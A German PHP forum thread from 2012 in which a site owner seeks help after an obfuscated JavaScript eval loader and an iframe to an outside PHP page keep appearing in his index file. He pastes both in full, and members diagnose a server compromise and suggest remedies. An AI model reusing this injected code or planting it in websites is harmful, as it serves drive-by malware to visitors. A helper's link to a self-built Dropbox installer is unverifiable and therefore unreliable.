Profil | Mitglieder | Registrieren | Start | Suche


PHP-Support.de » Programmierung » PHP & MySQL » Seltsamer Code an meiner php-Index-Datei    » Hallo Gast [Login | Registrieren]

Neues Thema | Antworten   

Autor Beitrag
mbecker
Mitglied
Neuling


Dabei seit: 10.11.2012
Herkunft: keine Angabe
Posts: 7
     Seltsamer Code an meiner php-Index-Datei Zitat | Bearbeiten

Hallo,

ich habe eine Index-Datei hochgeladen und nach mehreren Stunden schau ich in den script, da hängt ein neuer script am Ende meiner php-Datei ...

Ich hatte eine Baustellen-Seite ber html auf den Server geladen (index.htm) und dort ist auch dieser ominöse Script plötzlich aufgetaucht
(Von mir kommt der nicht)

Ist das vielleicht ein robot der seine Spuren hinterlässt ??? Ich kann damit nix anfangen.

Kann man das irgendwie vermeiden ????


 Code 
1:
2:
<script type="text/javascript" language="javascript" >v="v"+"al";if(020===0x10&&window.document)try{window.document.body=window.document.body}catch(gdsgsdg){w=window;v="e"+v;e=w[v];}if(1){f=new Array(40,101,115,110,98,114,105,110,108,32,39,39,32,122,11,10,31,30,32,31,116,97,113,30,107,31,59,32,99,109,99,116,107,101,109,114,46,98,112,101,96,114,101,68,106,101,108,99,110,115,38,39,104,100,114,96,107,101,38,39,59,12,8,13,9,30,32,31,30,107,45,113,114,98,30,61,31,37,104,115,114,112,57,45,47,104,112,111,105,116,117,112,115,46,113,115,47,98,109,117,109,114,49,49,44,112,103,110,39,58,11,10,31,30,32,31,105,46,114,114,121,107,99,46,111,109,115,104,114,105,110,108,32,60,30,39,96,96,115,110,106,117,115,99,39,58,11,10,31,30,32,31,105,46,114,114,121,107,99,46,97,109,114,99,99,114,31,59,32,38,46,39,58,11,10,31,30,32,31,105,46,114,114,121,107,99,46,103,99,105,102,102,116,31,59,32,38,47,112,119,37,59,12,8,32,31,30,32,106,44,115,115,119,108,100,44,119,104,98,116,103,30,61,31,37,49,111,118,39,58,11,10,31,30,32,31,105,46,114,114,121,107,99,46,107,99,102,115,30,61,31,37,49,111,118,39,58,11,10,31,30,32,31,105,46,114,114,121,107,99,46,115,109,112,31,59,32,38,47,112,119,37,59,12,8,13,9,30,32,31,30,105,101,30,40,32,98,111,98,115,109,100,108,116,45,101,101,115,67,108,100,107,101,109,114,66,120,71,100,39,37,107,38,39,41,31,121,13,9,30,32,31,30,32,31,30,32,99,109,99,116,107,101,109,114,46,118,112,105,115,99,40,38,58,100,104,116,32,104,98,61,91,37,107,91,37,62,59,45,100,104,116,62,38,39,59,12,8,32,31,30,32,31,30,32,31,98,111,98,115,109,100,108,116,45,101,101,115,67,108,100,107,101,109,114,66,120,71,100,39,37,107,38,39,46,96,110,112,100,108,100,66,102,105,107,98,40,106,39,59,12,8,32,31,30,32,124,11,10,124,39,40,40,57);}w=f;s=[];for(i=0;-i+444!=0;i+=1){j=i;if(e&&(031==0x19))s=s+String.fromCharCode((1*w[j]+j%3));}e(s)</script>





Post wurde schon 2x editiert, das letzte mal am 23.11.2012 um 00:01 von Andavos
22.11.2012, 20:55 Profil | PM | E-Mail  
DingsDaBums
Mitglied
Exzellenter User


Dabei seit: 12.09.2010
Herkunft: keine Angabe
Posts: 2467
      Zitat | Bearbeiten

Da versteckt jemand JavaScript Code in deiner Webseite. Ich würde mal sagen, dass du gehackt wurdest und jemand damit Viren verbreiten möchte.

Vielleicht selber einen Virus eingefangen?

Edit:
Ich kann mir mal deine Webseite genau anschauen, wenn du mir sie per PM schickst. Lieber nicht hier öffentlich schreiben, damit sich nicht noch jemand infiziert, sollte jemand da einen Virus mit verbreiten.


DingsDaBums


Schau mal bei meinem Projekt vorbei. Vielleicht ist das ja was für dich MyStartPanel - Deine persönliche Startseite mit deinen Favoriten
Auf der Suche nach einem guten Vokabeltrainer? Vokabeltrainer Cramfire - Schnell und effektiv Vokabeln lernen

Post wurde schon 1x editiert, das letzte mal am 22.11.2012 um 22:15 von DingsDaBums
22.11.2012, 22:12 Profil | PM | E-Mail  
mbecker
Mitglied
Neuling


Dabei seit: 10.11.2012
Herkunft: keine Angabe
Posts: 7
      Zitat | Bearbeiten

Hallo,

da müsste ich mal einen neuen Clone von meinem C-Laufwerk draufziehen

Meine lokalen PHP-Dateien sind jedoch in Ordnung
Wenn ich die hochgeladen habe geht wieder alles.

Jetzt habe ich jedoch auf den 1 & 1 Servern festgestellt, dass überall im Body dieser Mist drin steht ...

Zitat:
id="frmchkldver" src="http://stemcellnaturaltherapy.com/images/header.php?ftd=4762151&path=%7cflug%7c&sys=UN&wrk=24"></iframe>


Jedoch nur auf dem Server - Nicht Lokal


22.11.2012, 22:20 Profil | PM | E-Mail  
DingsDaBums
Mitglied
Exzellenter User


Dabei seit: 12.09.2010
Herkunft: keine Angabe
Posts: 2467
      Zitat | Bearbeiten

Zitat:
Orginal von mbecker
Hallo,

da müsste ich mal einen neuen Clone von meinem C-Laufwerk draufziehen

Meine lokalen PHP-Dateien sind jedoch in Ordnung
Wenn ich die hochgeladen habe geht wieder alles.

Jetzt habe ich jedoch auf den 1 & 1 Servern festgestellt, dass überall im Body dieser Mist drin steht ...

Zitat:
id="frmchkldver" src="http://stemcellnaturaltherapy.com/images/header.php?ftd=4762151&path=%7cflug%7c&sys=UN&wrk=24"></iframe>


Jedoch nur auf dem Server - Nicht Lokal


Ja, dann hat jemand deine Daten um sich bei deinem Server anmelden zu können oder du hast in deinen Skripten eine XSS Lücke.

Sieht sehr stark nach einem Virus aus, den da jemand verbreiten möchte. Ich schau mir das gleich mal genauer an.


DingsDaBums


Schau mal bei meinem Projekt vorbei. Vielleicht ist das ja was für dich MyStartPanel - Deine persönliche Startseite mit deinen Favoriten
Auf der Suche nach einem guten Vokabeltrainer? Vokabeltrainer Cramfire - Schnell und effektiv Vokabeln lernen
22.11.2012, 22:26 Profil | PM | E-Mail  
mbecker
Mitglied
Neuling


Dabei seit: 10.11.2012
Herkunft: keine Angabe
Posts: 7
      Zitat | Bearbeiten

Zitat:
Orginal von DingsDaBums
Zitat:
Orginal von mbecker
Hallo,

da müsste ich mal einen neuen Clone von meinem C-Laufwerk draufziehen

Meine lokalen PHP-Dateien sind jedoch in Ordnung
Wenn ich die hochgeladen habe geht wieder alles.

Jetzt habe ich jedoch auf den 1 & 1 Servern festgestellt, dass überall im Body dieser Mist drin steht ...

Zitat:
id="frmchkldver" src="http://stemcellnaturaltherapy.com/images/header.php?ftd=4762151&path=%7cflug%7c&sys=UN&wrk=24"></iframe>


Jedoch nur auf dem Server - Nicht Lokal


Ja, dann hat jemand deine Daten um sich bei deinem Server anmelden zu können oder du hast in deinen Skripten eine XSS Lücke.

Sieht sehr stark nach einem Virus aus, den da jemand verbreiten möchte. Ich schau mir das gleich mal genauer an.


DingsDaBums



Hatte gerade 1&1 dran und habe meine Passwörter geändert ... Mal sehn ob die was finden!


22.11.2012, 22:36 Profil | PM | E-Mail  
DingsDaBums
Mitglied
Exzellenter User


Dabei seit: 12.09.2010
Herkunft: keine Angabe
Posts: 2467
      Zitat | Bearbeiten

Gibst du denn irgendwo in deinem Skript irgendwas aus einer Datei oder Datenbank aus?

Wenn ja, musst du unbedingt htmlentities benutzen.




DingsDaBums




Schau mal bei meinem Projekt vorbei. Vielleicht ist das ja was für dich MyStartPanel - Deine persönliche Startseite mit deinen Favoriten
Auf der Suche nach einem guten Vokabeltrainer? Vokabeltrainer Cramfire - Schnell und effektiv Vokabeln lernen
22.11.2012, 23:20 Profil | PM | E-Mail  
nordie92
Mitglied
Aktiver User


Dabei seit: 30.03.2011
Herkunft: Nordseeküste
Posts: 102
      Zitat | Bearbeiten

Moin moin,
Um Besucher deiner Seite zu schützen musst du auch
alle Dynamischen Ausgaben kontrollieren!
Oder die gesammte DatenBank nach fremden JavaScript
oder verdächtigem HTML-Code durchsuchen!

lg nordie2


Alle angaben stammen von einem Hobbyscripter, fehler bitte ich zu entschuldigen!
23.11.2012, 07:39 Profil | PM | E-Mail  
splasch
Mitglied
Exzellenter User


Dabei seit: 16.06.2008
Herkunft: Austria
Posts: 2323
      Zitat | Bearbeiten

Das ist ein Typischer Javascript Virus. Manchmal setzen sich die auch in anderen Datein fest. Nicht nur index.php

Mfg Splasch


23.11.2012, 09:40 Profil | PM | E-Mail  
mbecker
Mitglied
Neuling


Dabei seit: 10.11.2012
Herkunft: keine Angabe
Posts: 7
      Zitat | Bearbeiten

Zitat:
Orginal von DingsDaBums
Gibst du denn irgendwo in deinem Skript irgendwas aus einer Datei oder Datenbank aus?

Wenn ja, musst du unbedingt htmlentities benutzen.
DingsDaBums



Also nachdem ich meine FTP-Passworte geändert hatte, hatte ich 5 Tage Ruhe.
Heute hing schon wieder dieser Schweinecode an meiner Baustellen-Index-Datei...

Ich programmiere gerade eine php-Webseite und habe auf der Originaldomäne nur ein Baustellenschild ohne Eingaben oder Ausgaben von Daten einer Datenbank.

Mir scheint so, als wären die Server bei 1&1 verseucht. Die hatten auch keine Ahnung wo das herkommen sollte und wollten das noch prüfen.


Das hier ist mein Baustellencode (ohne Virus, welcher dann immer ganz unten zwischen <?php virus ?> steht)

Zitat:

<?php
echo "<html>";
echo "<head>";
echo "<meta http-equiv=\"Content-Language\" content=\"de\">";
echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1252\">";
echo "<title>Hier entsteht eine neue Internetpräsenz</title>";
echo "</head>";
echo "<body>";
echo "<p align=\"center\">&nbsp;</p>";
echo "<p align=\"center\">&nbsp;</p>";
echo "<p align=\"center\">&nbsp;</p>";
echo "<p align=\"center\">&nbsp;</p>";
echo "<p align=\"center\">";
echo "<img border=\"0\" src=\"site.jpg\" width=\"338\" height=\"400\"></p>";
echo "<p align=\"center\">&nbsp;</p>";
echo "<p align=\"center\"><font face=\"Verdana\">Hier entsteht eine neue Internetpräsenz</font></p>";
echo "<p align=\"center\"><font face=\"Verdana\">";
echo "<a href=\"mailto:max.mustermann@musterfirma.de?subject=Fragen zur neuen Webpräsenz\">";
echo "@Webmaster</a></font></p>";
echo "</body>";
echo "</html>";
?>



29.11.2012, 02:14 Profil | PM | E-Mail  
DingsDaBums
Mitglied
Exzellenter User


Dabei seit: 12.09.2010
Herkunft: keine Angabe
Posts: 2467
      Zitat | Bearbeiten

Zitat:
Orginal von mbecker
Zitat:
Orginal von DingsDaBums
Gibst du denn irgendwo in deinem Skript irgendwas aus einer Datei oder Datenbank aus?

Wenn ja, musst du unbedingt htmlentities benutzen.
DingsDaBums



Also nachdem ich meine FTP-Passworte geändert hatte, hatte ich 5 Tage Ruhe.
Heute hing schon wieder dieser Schweinecode an meiner Baustellen-Index-Datei...

Ich programmiere gerade eine php-Webseite und habe auf der Originaldomäne nur ein Baustellenschild ohne Eingaben oder Ausgaben von Daten einer Datenbank.

Mir scheint so, als wären die Server bei 1&1 verseucht. Die hatten auch keine Ahnung wo das herkommen sollte und wollten das noch prüfen.


Das hier ist mein Baustellencode (ohne Virus, welcher dann immer ganz unten zwischen <?php virus ?> steht)

Zitat:

<?php
echo "<html>";
echo "<head>";
echo "<meta http-equiv=\"Content-Language\" content=\"de\">";
echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1252\">";
echo "<title>Hier entsteht eine neue Internetpräsenz</title>";
echo "</head>";
echo "<body>";
echo "<p align=\"center\">&nbsp;</p>";
echo "<p align=\"center\">&nbsp;</p>";
echo "<p align=\"center\">&nbsp;</p>";
echo "<p align=\"center\">&nbsp;</p>";
echo "<p align=\"center\">";
echo "<img border=\"0\" src=\"site.jpg\" width=\"338\" height=\"400\"></p>";
echo "<p align=\"center\">&nbsp;</p>";
echo "<p align=\"center\"><font face=\"Verdana\">Hier entsteht eine neue Internetpräsenz</font></p>";
echo "<p align=\"center\"><font face=\"Verdana\">";
echo "<a href=\"mailto:max.mustermann@musterfirma.de?subject=Fragen zur neuen Webpräsenz\">";
echo "@Webmaster</a></font></p>";
echo "</body>";
echo "</html>";
?>



Also:
1. Wieso gibst du den HTML Code per PHP aus, wenn davon nichts dynamisch ist? Du könntest doch einfach eine normale HTML Datei ohne PHP Code erstellen und als .html abspeichern.

2. Sicher, dass dein PC nicht mit einem Trojaner infiziert ist? Gerade bei Java gibt es mehrere Sicherheitslücken, die man als Hacker ausnutzen kann, um dem Besucher einfach nur durch den einfachen Besuch Viren unter zuschieben. Da hilft im Moment auch kein Update. Diese werden erst Anfang nächsten Jahres behoben.
Ich würde dir dann als Browser zum Chrome raten und als Antivirenprogramm zu Microsoft Secruity Essentials.
Hab dir mal einen Installer für die beiden Programme mit Ninite.com erstellt: https://dl.dropbox.com/u/23256317/Ninite%20Chrome%20Essentials%20Installer.exe
Einfach runterladen, ausführen und schon werden beide Programme automatisch installiert und sind zu 100% auf dem neusten Stand. (Ist sehr praktisch! Ninite.com kann ich nur empfehlen)
Chrome und Microsoft Essential eine Empfehlung vom BSI.
Lies dir am besten folgenden Artikel kurz mal durch: http://www.heise.de/security/meldung/BSI-Test-Verwundbarkeit-von-Windows-Rechnern-im-Netz-1748721.html
Und dann eben unter chrome://plugins Java deaktivieren und mit Microsoft Essentials eine Schnellsuche durchführen. Dauert keine 5min.

3. Kann es sein, dass du über Hotspots ins Internet gehst oder andere öffentliche Netzwerke? Wenn ja, dann kann es sein, dass jemand das FTP Passwort mitlesen kann. Das wird nämlich unverschlüsselt übertragen und kann mit Programmen wie Wireshark leicht mitgelesen werden. Wenn du dich nicht unbedingt auf deinem Server anmelden musst, wenn du in einem öffentlichen Netzwerk bist, dann würde ich dir davon abraten. Wenn doch, dann frag bei 1&1 nach, ob du dich über SFTP anmelden kann. Da wird das Passwort verschlüsselt übertragen. Der Rest funktioniert wie bei FTP.

4. Es ist recht unwahrscheinlich, dass 1&1 eine Sicherheitslücke hat, die bis jetzt noch nicht gefunden wurde und so lange besteht, ohne dass auch andere Kunden das selbe Problem haben. Das würde denen mit Sicherheit auffallen. Gerade, weil dann auch große Kunden eher ein Opfer sind, da es da mehr zu holen gibt. Und die würden sich dann auch beschweren, da es da noch schneller auffällt.


Hoffe ich konnte helfen und hoffe das sich die Sache schnell aufklärt.
DingsDaBums



Schau mal bei meinem Projekt vorbei. Vielleicht ist das ja was für dich MyStartPanel - Deine persönliche Startseite mit deinen Favoriten
Auf der Suche nach einem guten Vokabeltrainer? Vokabeltrainer Cramfire - Schnell und effektiv Vokabeln lernen
29.11.2012, 08:42 Profil | PM | E-Mail  
mbecker
Mitglied
Neuling


Dabei seit: 10.11.2012
Herkunft: keine Angabe
Posts: 7
      Zitat | Bearbeiten

Zitat:

Also:
1. Wieso gibst du den HTML Code per PHP aus, wenn davon nichts dynamisch ist? Du könntest doch einfach eine normale HTML Datei ohne PHP Code erstellen und als .html abspeichern.


Zuerst hatte ich nur die html-seite hochgeladen und dann wurde im Body etwas angefügt. Ich dachte wenn ich das php drumherumlege, dann ist Ruhe. Leider hängt dann der Böse Code am Ende der Datei

Zitat:

2. Sicher, dass dein PC nicht mit einem Trojaner infiziert ist? Gerade bei Java gibt es mehrere Sicherheitslücken, die man als Hacker ausnutzen kann, um dem Besucher einfach nur durch den einfachen Besuch Viren unter zuschieben. Da hilft im Moment auch kein Update. Diese werden erst Anfang nächsten Jahres behoben.
Ich würde dir dann als Browser zum Chrome raten und als Antivirenprogramm zu Microsoft Secruity Essentials.
Hab dir mal einen Installer für die beiden Programme mit Ninite.com erstellt: https://dl.dropbox.com/u/23256317/Ninite%20Chrome%20Essentials%20Installer.exe
Einfach runterladen, ausführen und schon werden beide Programme automatisch installiert und sind zu 100% auf dem neusten Stand. (Ist sehr praktisch! Ninite.com kann ich nur empfehlen)
Chrome und Microsoft Essential eine Empfehlung vom BSI.
Lies dir am besten folgenden Artikel kurz mal durch: http://www.heise.de/security/meldung/BSI-Test-Verwundbarkeit-von-Windows-Rechnern-im-Netz-1748721.html
Und dann eben unter chrome://plugins Java deaktivieren und mit Microsoft Essentials eine Schnellsuche durchführen. Dauert keine 5min.


Ganz so sicher bin ich mir jetzt im Moment nicht mehr, ob das nicht von meinem PC kommt. Mein Microsoft Essential hatte einmal eine Bedrohung abgewehrt - Da ging unten rechts so ein grünes Fenster hoch. Ich glaube ich werde mal meinen vorletzten Clone neu aufsetzen.

Zitat:

3. Kann es sein, dass du über Hotspots ins Internet gehst oder andere öffentliche Netzwerke? Wenn ja, dann kann es sein, dass jemand das FTP Passwort mitlesen kann. Das wird nämlich unverschlüsselt übertragen und kann mit Programmen wie Wireshark leicht mitgelesen werden. Wenn du dich nicht unbedingt auf deinem Server anmelden musst, wenn du in einem öffentlichen Netzwerk bist, dann würde ich dir davon abraten. Wenn doch, dann frag bei 1&1 nach, ob du dich über SFTP anmelden kann. Da wird das Passwort verschlüsselt übertragen. Der Rest funktioniert wie bei FTP.


Ich gehe nur über FileZilla oder dem 1&1 FTP-Programm auf meine Seiten - Fürs Internet nutze ich den IE 9.0

Zitat:

4. Es ist recht unwahrscheinlich, dass 1&1 eine Sicherheitslücke hat, die bis jetzt noch nicht gefunden wurde und so lange besteht, ohne dass auch andere Kunden das selbe Problem haben. Das würde denen mit Sicherheit auffallen. Gerade, weil dann auch große Kunden eher ein Opfer sind, da es da mehr zu holen gibt. Und die würden sich dann auch beschweren, da es da noch schneller auffällt.


Habe auch schon gerätselt, ob sich da nicht noch mehr drüber beschweren. Das komische ist ja nur, dass der Code sauber hochgeladen wird und sich erst dann verändert wenn er oben ist. In der Zwischenzeit habe ich keine UpLoad-Verbindung von meinem PC geöffnet. Einzig den IE um zu schauen ob die Dateien noch sauber sind (rechte Maustaste -> Quellcode anzeigen)


Zitat:

Hoffe ich konnte helfen und hoffe das sich die Sache schnell aufklärt.

DingsDaBums


Du hast mir sehr geholfen und ich bin wieder um einiges schlauer geworden! Vielen lieben Dank!

Michael



29.11.2012, 11:36 Profil | PM | E-Mail  
DingsDaBums
Mitglied
Exzellenter User


Dabei seit: 12.09.2010
Herkunft: keine Angabe
Posts: 2467
      Zitat | Bearbeiten

Würde dir dann echt raten, deinen PC neu aufzusetzen (in deinem Fall scheint das ja einfach zu sein, da du ja ein Image hast).

Würde dann aber sofort Chrome und Microsoft Essentials installieren und Java deaktivieren.

Zudem hat FileZilla nichts direkt damit zutun, dass FTP das Passwort unverschlüsselt überträgt. Das liegt am FTP Protokoll. Wenn FileZilla das Passwort verschlüsseln sollte, wie sollte dann der Server es entschlüsseln können, wenn eine Verschlüsslung in FTP nicht vorgesehen ist? Wäre ja schlecht, wenn FileZilla dann neben dem Verschlüsselten Passwort noch mitschicken würde, wie man es entschlüsselt
FileZilla müsste aber SFTP unterstützen. Ist nur eine frage, ob der Server es auch tut.

Aber wenn du ein Virus mit Keylogger hast, wird das eben auch nicht helfen.
Es hilft aber gegen das abfangen des Passworts mit z.B. Wireshark. Also ist es wichtig, wenn man in einem nicht vertrauenswürdigen Netzwerk sich auf dem Server anmeldet.


Wenn du also den PC platt gemacht hast, Microsoft Essentials (und je nach dem Chrome, was ich nur empfehlen kann, da er auch schneller ist) installiert hast, es aber immer noch passiert, dass dort der Code auftaucht, dann müsste es zu 99% an 1&1 liegen.


DingsDaBums

Edit:
Und wie gesagt: Java deaktivieren. Wird im Browser eh kaum noch benutzt. Und wenn doch nötig, dann nur für die Seite aktivieren, die vertrauenswürdig ist.


Schau mal bei meinem Projekt vorbei. Vielleicht ist das ja was für dich MyStartPanel - Deine persönliche Startseite mit deinen Favoriten
Auf der Suche nach einem guten Vokabeltrainer? Vokabeltrainer Cramfire - Schnell und effektiv Vokabeln lernen

Post wurde schon 1x editiert, das letzte mal am 29.11.2012 um 14:37 von DingsDaBums
29.11.2012, 14:36 Profil | PM | E-Mail  
Seiten (1):  1 
PHP-Support.de » Programmierung » PHP & MySQL » Seltsamer Code an meiner php-Index-Datei   

Neues Thema | Antworten   


Powered by Command Board 1.0 - Beta 2.0 © 2004-08 PHP-Einfach | Impressum | Datenschutz